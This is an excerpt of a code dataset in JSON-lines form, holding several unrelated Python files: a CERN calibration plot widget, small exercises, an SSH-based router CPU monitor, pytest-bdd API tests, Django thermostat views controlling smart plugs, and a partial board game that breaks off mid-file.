--------------------------------------------------------------------------\r\n# Copyright (c) <2017> \r\n# BE-BI-PM, CERN (European Organization for Nuclear Research)\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n# --------------------------------------------------------------------------\r\n#\r\n# Not fully documented\r\n\r\n\r\nfrom __future__ import unicode_literals\r\n\r\nimport os\r\nimport numpy as np\r\nimport scipy.io as sio\r\n\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout\r\nfrom matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar\r\n\r\nfrom lib import prairie\r\nfrom lib import utils\r\nfrom gui.mplCanvas import mplCanvas\r\n\r\n\r\nclass QTabMultipleResidualsShape(QWidget):\r\n\r\n def __init__(self, parent=None):\r\n\r\n super(QTabMultipleResidualsShape, self).__init__(parent=None)\r\n\r\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\r\n\r\n self.main_widget = QWidget(self)\r\n\r\n self.in_or_out = 'IN'\r\n self.folders = []\r\n\r\n main_layout = QVBoxLayout(self.main_widget)\r\n self.plot = plot(self.main_widget, width=6.5, height=6, dpi=100)\r\n self.navi_toolbar = NavigationToolbar(self.plot, self)\r\n main_layout.addWidget(self.navi_toolbar)\r\n main_layout.addWidget(self.plot)\r\n\r\n self.setLayout(main_layout)\r\n\r\n def set_folder(self, folders, in_or_out):\r\n self.folders = folders\r\n self.in_or_out = in_or_out\r\n self.plot.folders = folders\r\n self.plot.in_or_out = in_or_out\r\n self.plot.compute_initial_figure()\r\n self.plot.draw()\r\n\r\nclass plot(mplCanvas):\r\n \"\"\"Simple canvas with a sine plot.\"\"\"\r\n\r\n def __init__(self, parent, width, height, dpi):\r\n\r\n self.folders = []\r\n\r\n self.ax1 = 0\r\n\r\n self.in_or_out = 'IN'\r\n\r\n super(plot, self).__init__(parent, width, height, dpi)\r\n\r\n def compute_initial_figure(self):\r\n\r\n self.fig.clear()\r\n\r\n prairie.use()\r\n ax1 = self.fig.add_subplot(2, 1, 1)\r\n ax3 = self.fig.add_subplot(2, 1, 2)\r\n residuals_IN = []\r\n residuals_OUT = []\r\n laser_position_IN = []\r\n laser_position_OUT = []\r\n\r\n for folder in self.folders:\r\n\r\n if os.path.exists(folder + '/calibration_results.mat'):\r\n\r\n color = int(folder.split('/')[::-1][0].split('__')[1].split('_')[2])\r\n\r\n if int(folder.split('/')[::-1][0].split('__')[2].split('_')[0]) >= 12:\r\n color += 0.5\r\n\r\n data = sio.loadmat(folder + '/' + 'calibration_results.mat', struct_as_record=False, squeeze_me=True)\r\n residuals_IN.append(data['residuals_IN_origin_mean'])\r\n residuals_OUT.append(data['residuals_OUT_origin_mean'])\r\n laser_position_IN.append(data['laser_position_IN_mean'])\r\n laser_position_OUT.append(data['laser_position_OUT_mean'])\r\n\r\n if len(self.folders) > 1:\r\n\r\n M = []\r\n\r\n for residuals, laser_position in zip(residuals_IN, laser_position_IN):\r\n ax1.plot(laser_position, utils.butter_lowpass_filter(residuals, 1 / 101, 1 / 10) - np.mean(residuals),\r\n alpha=0.2, linewidth=2, label='_nolegend_')\r\n M.append(residuals)\r\n\r\n M = np.asarray(M)\r\n M = np.mean(M, 0)\r\n\r\n ax1.plot(laser_position, utils.butter_lowpass_filter(M, 1 / 101, 1 / 10), color='k', linewidth=2.5,\r\n label='Mean residual profile')\r\n ax1.set_xlabel('Laser position (mm)')\r\n ax1.set_ylabel('Residual error (\\u03BCm)')\r\n ax1.legend()\r\n prairie.style(ax1)\r\n\r\n M = []\r\n\r\n for residuals, laser_position in zip(residuals_OUT, laser_position_OUT):\r\n ax3.plot(laser_position, utils.butter_lowpass_filter(residuals, 1 / 101, 1 / 10) - np.mean(residuals),\r\n alpha=0.2, linewidth=2, label='_nolegend_')\r\n M.append(residuals)\r\n\r\n M = np.asarray(M)\r\n M = np.mean(M, 0)\r\n\r\n ax3.plot(laser_position, utils.butter_lowpass_filter(M, 1 / 101, 1 / 10), color='k', linewidth=2.5,\r\n label='Mean residual profile')\r\n ax3.set_xlabel('Laser position (mm)')\r\n ax3.set_ylabel('Residual error (\\u03BCm)')\r\n ax3.legend()\r\n prairie.style(ax3)","sub_path":"gui/QTabMultipleResidualsShape.py","file_name":"QTabMultipleResidualsShape.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177019440","text":"#!/usr/bin/python3\n\n\ndef divisible_by_2(my_list=[]):\n\n lst = []\n\n for i in range(0, len(my_list)):\n if my_list[i] % 2 == 0:\n lst.append(True)\n\n else:\n lst.append(False)\n\n return lst\n","sub_path":"0x03-python-data_structures/10-divisible_by_2.py","file_name":"10-divisible_by_2.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479939506","text":"from goto import with_goto\n\n@with_goto\ndef ejecutar():\n t1 = 2 * 2\n t2 = 5 #base potencia\n t3 = 1 #contador de potencia\n label .L3\n if(t3 < t1):\n goto .L1\n\n goto .L2\n label .L1\n t2 = t2 * 5\n t3 = t3+ 1\n goto .L3\n label .L2\n\n \n print('resultado = ' + str(t2))\n\n\nejecutar()","sub_path":"parser/fase2/team09/Instrucciones/C3D/c3d.py","file_name":"c3d.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85051480","text":"import sys\r\nimport os.path\r\nimport time\r\nimport datetime\r\nimport subprocess\r\nimport paramiko\r\nimport re\r\nimport threading\r\n\r\nimport matplotlib.pyplot as pyp\r\nimport matplotlib.animation as animation\r\n\r\ndef ip_file_valid():\r\n\r\n while True:\r\n ip_file = input(\"\\nEnter full path and name of IP file: \")\r\n if os.path.isfile(ip_file) == True:\r\n print('\\nFile {} exists\\n'.format(ip_file))\r\n break\r\n else:\r\n print('Invalid path or filename!\\nPlease try again')\r\n continue\r\n\r\n ip = open(ip_file, 'r')\r\n ip.seek(0)\r\n ip_list = ip.readlines()\r\n ip.close()\r\n return ip_list\r\n \r\n#############################################################\r\n\r\ndef ip_addr_valid(ip_list):\r\n for ip in ip_list:\r\n ip = ip.rstrip('\\n')\r\n ip_octets = ip.split('.')\r\n if (len(ip_octets ) == 4) and (int(ip_octets[0]) != 127) and (1 <= int(ip_octets[0]) <= 223) and (int(ip_octets[0]) != 169 or int(ip_octets[0]) != 254) and (0 <= int(ip_octets[1]) <= 255 and 0 <= int(ip_octets[2]) <= 255 and 0 <= int(ip_octets[3]) <= 255):\r\n continue\r\n else:\r\n print('There was an invalid IP address in file: {}'.format(ip))\r\n sys.exit()\r\n\r\n###################################################################\r\n\r\ndef ip_reach(iplist):\r\n for ip in iplist:\r\n ip = ip.rstrip('\\n')\r\n\r\n ping_reply = subprocess.call('ping %s /n 2' %(ip), stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)\r\n if ping_reply == 0:\r\n print('\\n *{} is reachable \\n'.format(ip))\r\n\r\n else:\r\n print('\\n Sorry, {} is not reachable :( Check connectivity and try again \\n'.format(ip))\r\n sys.exit()\r\n\r\n########################################################################\r\n\r\nwhile True:\r\n\r\n userfile = input('\\nEnter full path for a user file: ')\r\n if os.path.isfile(userfile) == True:\r\n print(\"\\n{} file exists\".format(userfile))\r\n break\r\n\r\n else:\r\n print(\"\\n{} file does not exist. Please check full path and try again.\\n\".format(userfile))\r\n\r\n\r\n \r\nwhile True:\r\n\r\n cmdfile = input('\\nEnter full path for a cmd file: ')\r\n if os.path.isfile(cmdfile) == True:\r\n print(\"\\n{} file exists\".format(cmdfile))\r\n break\r\n\r\n else:\r\n print(\"\\n{} file does not exist. Please check full path and try again.\\n\".format(cmdfile))\r\n \r\ndef ssh_connection(ip):\r\n try:\r\n \r\n global cmdfile\r\n global userfile\r\n \r\n user_file = open(userfile, 'r')\r\n user_file.seek(0)\r\n username = user_file.readlines()[0].split(',')[0].rstrip('\\n')\r\n user_file.seek(0)\r\n password = user_file.readlines()[0].split(',')[1].rstrip('\\n')\r\n user_file.close()\r\n \r\n session = paramiko.SSHClient()\r\n \r\n session.set_missing_host_key_policy(paramiko.AutoAddPolicy)\r\n \r\n session.connect(ip.rstrip('\\n'), username = username, password = password)\r\n \r\n connection = session.invoke_shell()\r\n \r\n \r\n connection.send('enable\\n')\r\n connection.send('terminal length 0\\n')\r\n time.sleep(1)\r\n \r\n cmd_file = open(cmdfile, 'r')\r\n cmd_file.seek(0)\r\n \r\n for command in cmd_file.readlines():\r\n connection.send(command.rstrip('\\n') + '\\n')\r\n time.sleep(2)\r\n \r\n cmd_file.close()\r\n \r\n output = connection.recv(65535)\r\n \r\n if re.search(b'% Invalid input', output):\r\n print('\\nThere was at least one IOS syntax error on device {}'.format(ip))\r\n \r\n else: \r\n print(\"Done for a device {}\\nData sent to file at {}\\n\\n\".format(ip, str(datetime.datetime.now())))\r\n \r\n cpu = re.search(b\"%Cpu\\(s\\):(\\s)+(.+?)(\\s)* us,\", output)\r\n utilization = cpu.group(2).decode('utf-8')\r\n \r\n with open(\"D:\\\\netapp\\\\3_build_graph\\\\cpu.txt\", 'a') as f:\r\n f.write(utilization + '\\n')\r\n \r\n \r\n except paramiko.AuthenticationException:\r\n print('* Invalid username or password \\n Please check username/password file and device configuration.\\n')\r\n print('* Closing program... Bye!')\r\n\r\n######################################################################################\r\n\r\ndef create_threads(iplist, function):\r\n threads = []\r\n for ip in iplist:\r\n th = threading.Thread(target = function, args = (ip,))\r\n th.start()\r\n threads.append(th)\r\n\r\n for th in threads:\r\n th.join()\r\n \r\n#################################################################################\r\n\r\nip_list = ip_file_valid()\r\n\r\ntry:\r\n ip_addr_valid(ip_list)\r\nexcept KeyboardInterrupt:\r\n print(\"Program was aborted by user!\")\r\n sys.exit()\r\n\r\ntry:\r\n ip_reach(ip_list)\r\nexcept KeyboardInterrupt:\r\n print(\"Program was aborted by user!\")\r\n sys.exit()\r\n\r\nwhile True:\r\n create_threads(ip_list, ssh_connection)\r\n time.sleep(10)\r\n \r\n #Creating new figure\r\n figure = pyp.figure()\r\n figure.clear()\r\n\r\n #Creating subplot with 1 row, 1 column, and index 1 meaning single subplot\r\n subplot = figure.add_subplot(1, 1, 1)\r\n subplot.clear()\r\n\r\n def animation_function(i):\r\n\r\n cpu_data = open(\"D:\\\\netapp\\\\3_build_graph\\\\cpu.txt\").readlines()\r\n\r\n x = []\r\n\r\n for each_value in cpu_data:\r\n if len(each_value) > 1:\r\n x.append(float(each_value))\r\n\r\n #Clearing/Refreshing the figure to avoid overwriting for each new poll (every 10 seconds)\r\n subplot.clear()\r\n\r\n #Plotting the values in the list\r\n subplot.plot(x)\r\n\r\n #Using the figure, the function and polling interval of 10000ms (10 seconds) to build the graph\r\n graph_animation = animation.FuncAnimation(figure, animation_function, interval = 10000)\r\n\r\n #Displaying the grapgh to the screen\r\n pyp.show()\r\n\r\n ","sub_path":"in_one.py","file_name":"in_one.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"296697646","text":"'''\nRestaurante Ean\n'''\nimport datetime\nfrom typing import Iterator\n\n# Obtener el día actual lunes 0 y domingo 6 en ese rango\ndia = datetime.date.today().weekday()\n#Reservaciones disponibles de lunes a domingo\nreservaciones = [80,100,80,100,80,100,100]\n# Menu por día\nmenus = [[\"Hamburguesa\",\"Perro caliente\",\"Sandwich\"],\n [\"Salchipapa\", \"Burritos\"],\n [\"Burritos\",\"Hamburguesa\",\"Perro caliente\"],\n [\"Hamburguesa\",\"Perro caliente\",\"Sandwich\"],\n [\"Salchipapa\", \"Burritos\"],\n [\"Burritos\",\"Hamburguesa\",\"Perro caliente\"],\n [\"Hamburguesa\",\"Perro caliente\",\"Sandwich\"]]\nplus = [\"Papa francesa\",\"Aro de cebolla\",\"Nugguets\"]\nbebidas = [\"Gaseosa\",\"Jugo\",\"Leche\"]\ninventario = [[\"Hamburguesa 🍔\",100,8000],\n [\"Perro caliente🌭\",100, 9000],\n [\"Sandwich 🥪\",100, 5000],\n [\"Burritos 🌯\",100, 10000],\n [\"Papa francesa 🍟\",100, 10000],\n [\"Aro de ceboll 🍟a\",100, 7000],\n [\"Nuggue 🍟🍟\",100, 4000]]\nclientes = []\nempleados = []\n # Menu\nwhile True:\n print(\"\\n========== Menu ==========\")\n print(\"[1] Ingresar Cliente 🧍🧍‍♀️\")\n print(\"[2] Ingresar Empleado 🚶\")\n print(\"[3] Mostrar clientes y empleados 👨‍👨‍👦‍👦\")\n print(\"[4] Pedir orden del dia 🍽🍔🍕🍟🌭\")\n print(\"[5] Pedir orden personalizada 🥪🧀\")\n print(\"[6] Inventario✅ \")\n print(\"[0] Salir\")\n opcion = input(\"Opcion: \")\n\n if opcion == \"1\":\n temp = []\n temp.append(input(\"Ingrese el nombre del cliente: \"))\n temp.append(input(\"Ingrese la cedula: \"))\n clientes.append(temp)\n \n if opcion == \"2\":\n temp = []\n temp.append(input(\"Ingrese el nombre del empleado: \"))\n temp.append(input(\"Ingrese la cedula: \"))\n empleados.append(temp)\n\n if opcion == \"3\":\n print(\"********** Clientes ***********\")\n for i in clientes:\n print(i[1],\" \",i[0])\n \n print(\"********** Empleados ***********\")\n for i in clientes:\n print(i[1],\" \",i[0])\n\n if opcion == \"4\":\n factura= []\n","sub_path":"RESTAURANTE.py","file_name":"RESTAURANTE.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530188364","text":"import json\nimport time\nimport socket\n\nimport pytest\nimport requests\nfrom pytest_bdd import given, scenario, then, when\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\n\ndef requests_retry_session(\n retries=5,\n backoff_factor=0.3,\n status_forcelist=(500, 502, 504),\n session=None,\n):\n session = session or requests.Session()\n retry = Retry(\n total=retries,\n read=retries,\n connect=retries,\n backoff_factor=backoff_factor,\n status_forcelist=status_forcelist,\n )\n adapter = HTTPAdapter(max_retries=retry)\n session.mount(\"http://\", adapter)\n session.mount(\"https://\", adapter)\n return session\n\n\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname)\n\nFASTAPI_URL = \"http://localhost:8000\"\n\n\n@scenario(\"001_wallet.feature\", \"Getting a public DID\")\ndef test_get_public_did():\n # bdd test\n pass\n\n\n@given(\"I have an admin API key\")\ndef admin_header():\n admin_headers = {\"x-api-key\": \"adminApiKey\"}\n return admin_headers\n\n\n@given(\"I do not have an admin API key\")\ndef admin_header_no_key():\n admin_headers = {}\n return admin_headers\n\n\n@when(\"I target the create DID endpoint\")\ndef target_did_enpoint():\n return \"/wallets/create-pub-did\"\n\n\n@pytest.mark.asyncio\n@then(\"I am able to generate a public DID\")\ndef test_gen_pub_did():\n header = admin_header()\n endpoint = target_did_enpoint()\n url = FASTAPI_URL + endpoint\n\n s = requests.Session()\n s.headers.update(header)\n result = requests.get(url, headers=header)\n time.sleep(10)\n res_dict = json.loads(result.content)\n assert \"did_object\" in res_dict\n assert \"issuer_verkey\" in res_dict\n assert \"issuer_endpoint\" in res_dict\n\n\n@then(\"I am unable to generate a public DID\")\ndef test_gen_pub_did_no_key():\n header = admin_header_no_key()\n endpoint = target_did_enpoint()\n url = FASTAPI_URL + endpoint\n\n s = requests.Session()\n s.headers.update(header)\n result = requests_retry_session().get(url)\n res_dict = json.loads(result.content)\n assert result.status_code == 401\n assert \"Unauthorized\" in res_dict[\"detail\"]\n assert \"did_object\" not in res_dict\n assert \"issuer_verkey\" not in res_dict\n assert \"issuer_endpoint\" not in res_dict\n","sub_path":"app/tests/bdd/steps/test_001_wallet.py","file_name":"test_001_wallet.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592154713","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib.auth.models import User, Group\nfrom django.http import JsonResponse\nfrom getenv import env\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, detail_route\nimport requests\nimport subprocess\n\nfrom datetime import date\n\nfrom pyHS100 import SmartPlug\n\nfrom thermo.helpers.helpers import *\nfrom thermo.serializers import *\nfrom thermo.models import *\n\n# Create your views here.\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass SetupView(generics.ListCreateAPIView):\n queryset = Setup.objects.all()\n serializer_class = SetupSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass SetupDetailView(viewsets.ModelViewSet):\n queryset = Setup.objects.all()\n serializer_class = SetupSerializer\n lookup_field=\"name\"\n\n @detail_route(methods=['put'])\n def update(self, request, name=None):\n setup = self.get_object()\n serializer = SetupSerializer(setup, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response({'status': True, 'name':setup.name, 'value': setup.value})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass RoomsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Rooms.objects.all()\n serializer_class = RoomsSerializer\n def perform_create(self, serializer):\n serializer.save()\n\n def list(request, *args, **kwargs):\n rooms = []\n for room in Rooms.objects.all():\n plugs_o = Plugs.objects.all().filter(room_id=room.id)\n plugs = []\n sensors = []\n for plug in plugs_o:\n plugs.append({\"id\":plug.id, 'ip':plug.ip, \"name\":plug.name, \"state\":plug.state})\n\n sensor_o = Sensors.objects.all().filter(room_id=room.id)\n for sensor in sensor_o:\n if env(\"DEBUG\") == True:\n data = {\"Temperature\": \"21\", \"Humidity\": \"56\"}\n else:\n data = requests.get('http://' + sensor.ip + '/data').json()\n\n sensors.append({'id': sensor.id, 'name': sensor.name, 'ip': sensor.ip ,'temperature': data['Temperature'], 'humidity': data['Humidity']})\n rooms.append({'id': room.id, 'name': room.name, 'plugs': plugs, 'sensors':sensors})\n return Response(rooms)\n\n\nclass RoomsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Rooms.objects.all()\n serializer_class = RoomsSerializer\n\nclass PlugsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Plugs.objects.all()\n serializer_class = PlugsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass PlugsDetailView(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Plugs.objects.all()\n serializer_class = PlugsSerializer\n\n @detail_route(methods=['put'])\n def update(self, request, pk=None):\n plug = self.get_object()\n\n serializer = PlugsSerializer(plug, data=request.data, partial=True)\n if serializer.is_valid():\n try:\n smplug = SmartPlug(request.data['ip'])\n if(request.data['state'] == '1' or request.data['state'] == True):\n print(\"test\")\n smplug.turn_on()\n else:\n print(\"test2\")\n smplug.turn_off()\n print(serializer.save())\n except:\n return Response({'error': 'Une erreur s\\'est produite'})\n return Response({'status': 'state set'})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass SensorsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Sensors.objects.all()\n serializer_class = SensorsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\n def list(request, *args, **kwargs):\n sensors = []\n for sensor in Sensors.objects.all():\n if env(\"DEBUG\") == True:\n data = {\"Temperature\": \"21\", \"Humidity\": \"56\"}\n else:\n data = requests.get('http://' + sensor.ip + '/data').json()\n\n sensors.append({'id':sensor.id, 'name': sensor.name, 'temperature':data['Temperature'], 'humidity':data['Humidity']})\n return Response(sensors)\n\nclass SensorsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Sensors.objects.all()\n serializer_class = SensorsSerializer\n\nclass LogsSensorsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsSensors.objects.all()\n serializer_class = LogsSensorsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass LogsSensorsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsSensors.objects.all()\n serializer_class = LogsSensorsSerializer\n\nclass LogsPlugsView(generics.ListCreateAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsPlugs.objects.all()\n serializer_class = LogsPlugsSerializer\n\n def perform_create(self, serializer):\n serializer.save()\n\nclass LogsPlugsDetailView(generics.RetrieveUpdateDestroyAPIView):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = LogsPlugs.objects.all()\n serializer_class = LogsPlugsSerializer\n\nclass CheckPresenceView(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n content = {\n 'user': unicode(request.user), # `django.contrib.auth.User` instance.\n 'auth': unicode(request.auth), # None\n }\n p = subprocess.Popen(\n \"ping -c1 -W1 iphone-de-sebastien.local | grep -o -E '[0-9]{0,3}\\.[0-9]{0,3}\\.[0-9]{0,3}'\",\n stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n p_status = p.wait()\n\n output = output.replace(\"\\n\", \"\")\n if output:\n\n return Response(output)\n else:\n return Response(err)\n\nclass CheckDataView(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n sensors = {}\n plugs = {}\n response = {}\n response['sensors'] = {}\n for sensor in Sensors.objects.all():\n if env(\"DEBUG\") == True:\n sensors[sensor.name] = {\"Temperature\": \"21\", \"Humidity\": \"56\"}\n else:\n sensors[sensor.name] = requests.get('http://' + sensor.ip + '/data').json()\n\n logsSensors = LogsSensors()\n logsSensors.temperature = sensors[sensor.name].get('Temperature')\n logsSensors.humidity = sensors[sensor.name].get('Humidity')\n logsSensors.sensor = sensor\n logsSensors.save()\n\n logsPlugs = LogsPlugs()\n plugs = Plugs.objects.all().filter(room_id=sensor.room.id)\n\n BoolInterval = False\n\n for ti in TimeInterval.objects.all().filter(room_id=sensor.room.id):\n\n if(isInTimeInterval(ti.startingTime, ti.endingTime)):\n BoolInterval = True\n\n presenceBool = True if sensors[sensor.name].get('Presence')==\"1\" else False #isPresent('iphone-de-sebastien.local')\n\n logPresence = LogsPresence()\n if presenceBool:\n logPresence.presence = 1\n logPresence.save()\n\n print(\"Presence:\"+str(presenceBool))\n condition = (isSetupTrue(\"ForceStop\") != True and presenceBool and BoolInterval == False) or (\n ((not presenceBool) or BoolInterval) and int(sensors[sensor.name]['Temperature']) < int(Setup.objects.get(name__iexact=\"MinTemperature\").value))\n\n print(\"condition1: \" + str((isSetupTrue(\"ForceStop\") != True and presenceBool and BoolInterval == False)))\n print(\"__\")\n print(\"condition2 : \" + str(((not presenceBool) or BoolInterval) and int(sensors[sensor.name]['Temperature']) < int(Setup.objects.get(name__iexact=\"MinTemperature\").value)))\n\n\n if condition:\n if presenceBool and (BoolInterval == False):\n askedTemperature = Setup.objects.get(name__iexact=\"Temperature\").value\n else:\n askedTemperature = Setup.objects.get(name__iexact=\"MinTemperature\").value\n\n print(askedTemperature)\n #print(sensors[sensor.name]['Temperature'])\n if int(sensors[sensor.name]['Temperature']) < int(askedTemperature) + 1:\n response['success'] = True\n response['sensors'][sensor.name] = {'state': \"on\"}\n logsPlugs.value = 1\n for plug in plugs:\n if(condition == True):\n print(\"ON \" + plug.ip)\n plug.state = True\n smplug = SmartPlug(plug.ip)\n smplug.turn_on()\n elif int(sensors[sensor.name]['Temperature']) >= int(askedTemperature) - 1:\n response['success'] = True\n response['sensors'][sensor.name] = {'state': \"off\"}\n logsPlugs.value = 0\n for plug in plugs:\n print(\"Off \" + plug.ip)\n plug.state = False\n smplug = SmartPlug(plug.ip)\n smplug.turn_off()\n else:\n logsPlugs.value = 0\n else:\n logsPlugs.value = 0\n for plug in plugs:\n smplug = SmartPlug(plug.ip)\n plug.state = False\n smplug.turn_off()\n\n logsPlugs.save()\n plug.save()\n return JsonResponse(response)\n","sub_path":"thermo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290538976","text":"# Mensch Ärgere Dich Nicht!\n# created on 17.11.2020 by Lerngruppe-Fuerchterlich\n\nimport random\nimport time\nimport colorama\ncolorama.init()\n\n# Was funktioniert:\n# - Spielfeld Loop\n# - Beliebige Spieleranzahl\n# - (simple) Spielfeldanzeige\n# - Rausschmeissen\n# - 3 Versuche, wenn keine Figur auf dem Feld ist\n\n# Einschränkungen:\n# - Zielsortierung ist egal\n# - Wenn man freimachen muss, kann es zu zwei Figuren auf einem Feld kommen (siehe TODO)\n\nclass MenschAergereDichNicht:\n # Class attribute\n version = \"1.0\"\n\n # Game\n def __init__(self, number_of_players):\n # instance attribute\n self.number_of_players = number_of_players\n self.game_size = number_of_players * 10\n self.players = []\n self.game_over = False\n \n print(\"starting...\", self.number_of_players, \"Players\")\n\n # init gamefield display\n self.gamefield = Gamefield(self)\n\n for p in range(self.number_of_players):\n self.players.append(Player(self, p*10, p))\n\n # Main Game Loop\n while True:\n for player in self.players:\n # show gamefield before every turn\n self.gamefield.show(self.players)\n\n print(\"\")\n print(\"Players\", player.id+1, \"Turn\")\n\n player.turn()\n\n if player.has_won():\n print(\"Game Over\")\n print(\"Player\", player.id+1, \"has won\")\n return\n\n\nclass Player:\n def __init__(self, parent, offset, id):\n self.parent = parent\n self.offset = offset\n self.name = \"Player \" + str(id)\n self.pieces = []\n self.id = id\n\n # Every player owns 4 pieces\n for _ in range(0,4):\n self.pieces.append(Piece(self))\n\n # true if one (or more) pieces is on the board\n def has_piece_outside(self):\n result = False\n for piece in self.pieces:\n if piece.position != -1 and piece.position < self.parent.game_size:\n result = True\n return result\n \n # seperate function needed, true if one (or more) pieces is in start\n def has_piece_inside(self):\n result = False\n for piece in self.pieces:\n if piece.position == -1:\n result = True\n return result\n\n # returns REAL (gamefield) positions of all 4 pieces (with offset)\n def get_piece_positions_offset(self):\n positions = []\n for piece in self.pieces:\n # old:\n # positions.append(piece.get_realposition())\n positions.append(self.calculate_realposition(piece))\n return positions\n\n # move piece from start area to board\n def place_piece_outside(self):\n for piece in self.pieces:\n if piece.position == -1:\n # kick other players from the start point\n if self.is_field_free(self.offset):\n piece.position = 0\n return\n print(\"ERROR: player has no piece in start area\")\n\n # Returns the piece object on starting point of current player\n def get_piece_on_start(self):\n for piece in self.pieces:\n if piece.position == 0:\n return piece\n return False\n\n # true if all pieces are in finish, expansion possible\n def has_won(self):\n won = True\n for piece in self.pieces:\n if piece.position < self.parent.game_size:\n won = False\n return won\n\n # main function, gets called every turn\n def turn(self):\n # Positions\n #print(\"Player\", self.id+1, \"Positions:\", self.get_piece_positions())\n # Real Positions\n print(\"Player\", self.id+1, \"Positions:\", self.get_piece_positions_offset())\n\n piece_on_start = self.get_piece_on_start()\n\n # is the player allowed to throw the dice 3 times?\n if self.has_piece_outside():\n # normal game\n dice = self.roll_dice()\n\n # Special Cases when a 6 is thrown:\n if dice == 6:\n # bonus roll\n next_dice = self.roll_dice()\n\n if self.has_piece_inside():\n if not piece_on_start:\n i = input(\"Move Piece from home to board? (y/n)\")\n if i != \"n\":\n # the first dice (6) will get used to place the piece\n self.place_piece_outside()\n piece_on_start = self.get_piece_on_start()\n if self.has_piece_inside():\n # has to move from start\n # TODO: check for kick and own pieces!\n piece_on_start.go_forward(next_dice)\n else:\n self.move_freely(next_dice)\n else:\n # the first dice (6) can be used to walk\n self.move_freely(dice)\n self.move_freely(next_dice)\n else:\n # has to move from start, TODO check for kick and own pieces\n piece_on_start.go_forward(next_dice)\n else:\n # player cant use the 